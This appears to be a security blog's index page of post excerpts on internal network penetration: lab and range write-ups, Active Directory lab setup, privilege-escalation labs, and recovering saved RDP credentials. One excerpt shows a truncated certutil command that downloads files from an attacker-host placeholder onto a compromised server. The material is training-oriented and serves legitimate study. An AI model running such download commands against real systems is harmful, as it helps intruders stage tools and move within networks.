lca


True lack of freedom is building a cage in your own heart.

Internal Network Penetration

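Post-Exploitation: File Transfer and Download

After gaining access to a server, you need to upload tools to it or download files from it. Different scenarios (network environments) may call for different file download tools, and they also come in handy when working through practice ranges, so here is a brief record. Windows: certutil -urlcache -split -f "http://<LHOST…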

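Chunqiu Yunjing (春秋云镜) Range: Certify Write-up

Certify is a medium-difficulty range environment. Completing this challenge helps players understand the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and teaches some interesting technical points of domain penetration. The range has 4 flags in total, distributed across different target machines.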

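ATT&CK Red Team Assessment Practice Range - 1

The range comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ A simple range, originally intended for assessing students but never used for that. The lateral movement in the domain only used the psexec module in Cobalt Strike; the main point is getting familiar with the penetration workflow. The range has…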

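Game of Active Directory (GOAD) Domain Environment Setup

The second version of Game Of Active Directory; project address: https://github.com/Orange-Cyberdefense/GOAD The domain range environment uses vagrant to install 5 Windows instances (three DCs and two ordinary domain hosts). The topology diagram is as follows: Official…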

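lpeworkshop Privilege Escalation Labs - Windows

Lab environment project address: https://github.com/sagishahar-zz/lpeworkshop Prerequisite for the Windows labs: you need to prepare an English-language Windows 7 (SP1) x64 Build 7601 operating system yourself; all of the original author's labs are based on this operating system. 1…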

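Internal Network Penetration Basics

Internal network: An internal network is an internal local area network, commonly called a LAN (local area network). Typical examples are home Wi-Fi networks and small business networks, where internal computers usually access the router directly and the router connects to a China Mobile or China Telecom fiber line to reach the Internet. An internal LAN can be divided into multiple networks using switches / firewalls (local area…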

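Internal Network Penetration: Retrieving Saved Passwords from Windows Remote Desktop (RDP) Connection Records

Precondition: when connecting with mstsc, the administrator ticked the option to save the password for automatic connection.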
Ownership of this blog data is guaranteed by blockchain and smart contracts to the creator alone.